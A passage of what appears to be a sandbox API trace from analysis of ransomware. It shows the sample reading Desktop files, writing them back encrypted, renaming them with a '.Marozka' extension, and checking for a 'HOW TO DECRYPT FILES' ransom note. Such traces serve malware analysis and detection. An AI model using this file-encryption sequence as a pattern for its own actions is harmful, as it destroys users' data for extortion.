"c:\\users\\fd1hvy\\desktop\\114p.mp4.marozka")) returned 1 [0043.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3Alz.png", lpFilePart=0x0) returned 0x20 [0043.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0043.904] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\3alz.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3fc [0043.904] GetFileType (hFile=0x3fc) returned 0x1 [0043.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0043.904] GetFileType (hFile=0x3fc) returned 0x1 [0043.904] GetFileSize (in: hFile=0x3fc, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x9d73 [0043.905] ReadFile (in: hFile=0x3fc, lpBuffer=0x272ad78, nNumberOfBytesToRead=0x9d73, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x272ad78*, lpNumberOfBytesRead=0x5beabc*=0x9d73, lpOverlapped=0x0) returned 1 [0043.906] CloseHandle (hObject=0x3fc) returned 1 [0044.151] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.151] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3Alz.png", lpFilePart=0x0) returned 0x20 [0044.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.152] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\3alz.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3fc [0044.184] GetFileType (hFile=0x3fc) returned 0x1 [0044.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.184] GetFileType (hFile=0x3fc) returned 0x1 [0044.184] WriteFile (in: hFile=0x3fc, lpBuffer=0x27a8ee4*, nNumberOfBytesToWrite=0x9d80, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27a8ee4*, lpNumberOfBytesWritten=0x5beab0*=0x9d80, lpOverlapped=0x0) returned 1 [0044.186] CloseHandle (hObject=0x3fc) returned 1 [0044.203] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3Alz.png", lpFilePart=0x0) returned 0x20 [0044.203] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3Alz.png.Marozka", lpFilePart=0x0) returned 0x28 [0044.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0044.204] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\3alz.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac030a50, ftCreationTime.dwHighDateTime=0x1d4ca28, ftLastAccessTime.dwLowDateTime=0x65631060, ftLastAccessTime.dwHighDateTime=0x1d4c74c, ftLastWriteTime.dwLowDateTime=0xdd1197bc, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x9d80)) returned 1 [0044.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0044.204] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\3alz.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\3Alz.png.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\3alz.png.marozka")) returned 1 [0044.253] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp", lpFilePart=0x0) returned 0x2b [0044.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0044.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\5hjapxf3pp927na.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3fc [0044.254] GetFileType (hFile=0x3fc) returned 0x1 [0044.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0044.254] GetFileType (hFile=0x3fc) returned 0x1 [0044.254] GetFileSize (in: hFile=0x3fc, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xca7d [0044.255] ReadFile (in: hFile=0x3fc, lpBuffer=0x27b30d0, nNumberOfBytesToRead=0xca7d, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27b30d0*, lpNumberOfBytesRead=0x5beabc*=0xca7d, lpOverlapped=0x0) returned 1 [0044.255] CloseHandle (hObject=0x3fc) returned 1 [0044.475] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.475] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.475] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp", lpFilePart=0x0) returned 0x2b [0044.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.475] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\5hjapxf3pp927na.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.477] GetFileType (hFile=0x2e0) returned 0x1 [0044.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.477] GetFileType (hFile=0x2e0) returned 0x1 [0044.477] WriteFile (in: hFile=0x2e0, lpBuffer=0x265dd00*, nNumberOfBytesToWrite=0xca80, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x265dd00*, lpNumberOfBytesWritten=0x5beab0*=0xca80, lpOverlapped=0x0) returned 1 [0044.480] CloseHandle (hObject=0x2e0) returned 1 [0044.486] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp", lpFilePart=0x0) returned 0x2b [0044.486] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp.Marozka", lpFilePart=0x0) returned 0x33 [0044.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0044.486] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\5hjapxf3pp927na.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8115130, ftCreationTime.dwHighDateTime=0x1d4d253, ftLastAccessTime.dwLowDateTime=0xe8d6f390, ftLastAccessTime.dwHighDateTime=0x1d4cee9, ftLastWriteTime.dwLowDateTime=0xdd3ee4bd, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xca80)) returned 1 [0044.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0044.486] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\5hjapxf3pp927na.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\5hJaPxF3pP927NA.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\5hjapxf3pp927na.bmp.marozka")) returned 1 [0044.487] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3", lpFilePart=0x0) returned 0x24 [0044.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0044.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\6-_kbmcq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.487] GetFileType (hFile=0x2e0) returned 0x1 [0044.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0044.487] GetFileType (hFile=0x2e0) returned 0x1 [0044.487] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x15b12 [0044.488] ReadFile (in: hFile=0x2e0, lpBuffer=0x3681768, nNumberOfBytesToRead=0x15b12, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x3681768*, lpNumberOfBytesRead=0x5beabc*=0x15b12, lpOverlapped=0x0) returned 1 [0044.490] CloseHandle (hObject=0x2e0) returned 1 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.629] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3", lpFilePart=0x0) returned 0x24 [0044.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.629] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\6-_kbmcq.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.631] GetFileType (hFile=0x2e0) returned 0x1 [0044.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.631] GetFileType (hFile=0x2e0) returned 0x1 [0044.631] WriteFile (in: hFile=0x2e0, lpBuffer=0x36edf38*, nNumberOfBytesToWrite=0x15b20, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x36edf38*, lpNumberOfBytesWritten=0x5beab0*=0x15b20, lpOverlapped=0x0) returned 1 [0044.633] CloseHandle (hObject=0x2e0) returned 1 [0044.639] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3", lpFilePart=0x0) returned 0x24 [0044.639] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3.Marozka", lpFilePart=0x0) returned 0x2c [0044.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0044.639] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\6-_kbmcq.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcee8c500, ftCreationTime.dwHighDateTime=0x1d4d5c2, ftLastAccessTime.dwLowDateTime=0xb4dff700, ftLastAccessTime.dwHighDateTime=0x1d4ce4c, ftLastWriteTime.dwLowDateTime=0xdd56bdbe, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x15b20)) returned 1 [0044.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0044.639] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\6-_kbmcq.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\6-_KbMcq.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\6-_kbmcq.mp3.marozka")) returned 1 [0044.640] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi", lpFilePart=0x0) returned 0x2e [0044.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0044.640] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\6xcow2fgfi5l4rrigw.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.640] GetFileType (hFile=0x2e0) returned 0x1 [0044.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0044.640] GetFileType (hFile=0x2e0) returned 0x1 [0044.640] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xb427 [0044.641] ReadFile (in: hFile=0x2e0, lpBuffer=0x26b8034, nNumberOfBytesToRead=0xb427, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26b8034*, lpNumberOfBytesRead=0x5beabc*=0xb427, lpOverlapped=0x0) returned 1 [0044.641] CloseHandle (hObject=0x2e0) returned 1 [0044.702] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.702] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi", lpFilePart=0x0) returned 0x2e [0044.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\6xcow2fgfi5l4rrigw.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.705] GetFileType (hFile=0x2e0) returned 0x1 [0044.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.705] GetFileType (hFile=0x2e0) returned 0x1 [0044.705] WriteFile (in: hFile=0x2e0, lpBuffer=0x2726ac4*, nNumberOfBytesToWrite=0xb430, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2726ac4*, lpNumberOfBytesWritten=0x5beab0*=0xb430, lpOverlapped=0x0) returned 1 [0044.706] CloseHandle (hObject=0x2e0) returned 1 [0044.749] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi", lpFilePart=0x0) returned 0x2e [0044.749] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi.Marozka", lpFilePart=0x0) returned 0x36 [0044.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0044.750] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\6xcow2fgfi5l4rrigw.avi"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf961fc0, ftCreationTime.dwHighDateTime=0x1d4d5e7, ftLastAccessTime.dwLowDateTime=0x4e121c90, ftLastAccessTime.dwHighDateTime=0x1d4d2f4, ftLastWriteTime.dwLowDateTime=0xdd676c5c, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xb430)) returned 1 [0044.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0044.750] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\6xcow2fgfi5l4rrigw.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\6XCOW2FGFI5L4RrIGW.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\6xcow2fgfi5l4rrigw.avi.marozka")) returned 1 [0044.750] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg", lpFilePart=0x0) returned 0x24 [0044.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0044.751] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a1_kt9vz.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.751] GetFileType (hFile=0x2e0) returned 0x1 [0044.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0044.751] GetFileType (hFile=0x2e0) returned 0x1 [0044.751] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1384c [0044.751] ReadFile (in: hFile=0x2e0, lpBuffer=0x27323d4, nNumberOfBytesToRead=0x1384c, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27323d4*, lpNumberOfBytesRead=0x5beabc*=0x1384c, lpOverlapped=0x0) returned 1 [0044.752] CloseHandle (hObject=0x2e0) returned 1 [0044.841] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0044.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0044.841] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0044.841] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg", lpFilePart=0x0) returned 0x24 [0044.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0044.841] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a1_kt9vz.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0044.843] GetFileType (hFile=0x2e0) returned 0x1 [0044.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0044.843] GetFileType (hFile=0x2e0) returned 0x1 [0044.843] WriteFile (in: hFile=0x2e0, lpBuffer=0x27b9ac0*, nNumberOfBytesToWrite=0x13850, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27b9ac0*, lpNumberOfBytesWritten=0x5beab0*=0x13850, lpOverlapped=0x0) returned 1 [0044.845] CloseHandle (hObject=0x2e0) returned 1 [0044.848] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg", lpFilePart=0x0) returned 0x24 [0044.848] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg.Marozka", lpFilePart=0x0) returned 0x2c [0044.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0044.848] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A1_KT9VZ.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\a1_kt9vz.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36556440, ftCreationTime.dwHighDateTime=0x1d4cda9, ftLastAccessTime.dwLowDateTime=0xa6127af0, ftLastAccessTime.dwHighDateTime=0x1d4c77f, ftLastWriteTime.dwLowDateTime=0xdd75bb7d, 